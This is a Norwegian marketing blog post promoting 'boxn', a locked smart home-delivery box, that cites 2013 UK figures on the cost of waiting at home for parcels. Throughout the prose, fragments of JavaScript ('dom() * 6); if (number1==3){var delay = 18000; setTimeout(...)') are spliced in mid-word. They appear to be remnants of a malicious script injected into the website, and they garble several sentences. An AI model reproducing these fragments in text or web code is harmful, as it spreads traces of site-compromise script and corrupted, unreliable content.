Hva koster det å sitte å vente på en hjemlevering?

10 milliarder norske kroner i 2013!

Vi vet alle hva det største problemet med hjemlevering i dag er. Det er å måtte velge et tidsintervall som strekker seg over mange timer. Der hvor man er nødt til å være hjemme for å skrive under på at varene er levert. Ja, noen distributører har sagt de kan legge igjen pakken et sted og risikoen på leveringen sitter på kunden. Kanskje budet ikke la igjen pakken i det hele tatt, eller noen så pakken ligge ved siden av inngangsdøren og dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok den med seg. På småpakker og ting med lavere kostnad vil man kanskje kunne ta risikoen, men med en ny mobil eller annen elektronikk er dette en dyr sjanse å ta. Hva koster det oss egentlig å sitte hjemme og vente på en hjemlevering?

I mangel på gode tall fra Norge, ser vi på Engldom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and og diyweek.net. Her var kostnadene for kun venting på hjemlevering i Sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torbritania i juletiden 2013 på 868 millioner pund. Dette var i 2013 og netthdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andel utgjorde da ca 10% av hdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andelsvolumet, mens det i dag utgjør mer enn 30% av hdom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andelsvolumet. I 2013 måtte hver person vente i snitt 2,5 timer på levering av pakker. Det er dette Unloc refererer til som «husarrest». I tillegg til dette fant de ut at 79% av de spurte hadde opplevd at leveransen kom forsinket. Hele 61% fikk ikke leveringen sin som avtalt første gang. Da blir man nødt til å vente enda en gang i et sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort leverings intervall. På dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toppen av dette kommer miljøkostnadene og merkostnadene for distributørene som må prøve igjen eller transportere tilbake til hentested.

Frittstående boxn for eneboliger

Et låst, intelligent hjemleveringspunkt!

Vi mener at boxn kunne løst disse problemene. Et låst, intelligent hjemleveringspunkt som kan ta imot pakkene for deg uten at du trenger å være hjemme. Muligheten for at du får levert feil pakke er ikke tilstede da det er kun din pakke som kan åpne din boxn. Når budet har levert pakken vil både du som kunde og budet få en bekreftelse. Da blir usikkerhetsmomentet her borte.

Ønsker du å bli med på revolusjonen av hjemlevering? Les mer på hjemmesiden vår. Ta kontakt med oss dersom du ønsker å bestille en boxn til eneboligen eller borettslaget du bor i.

nb_NONorwegian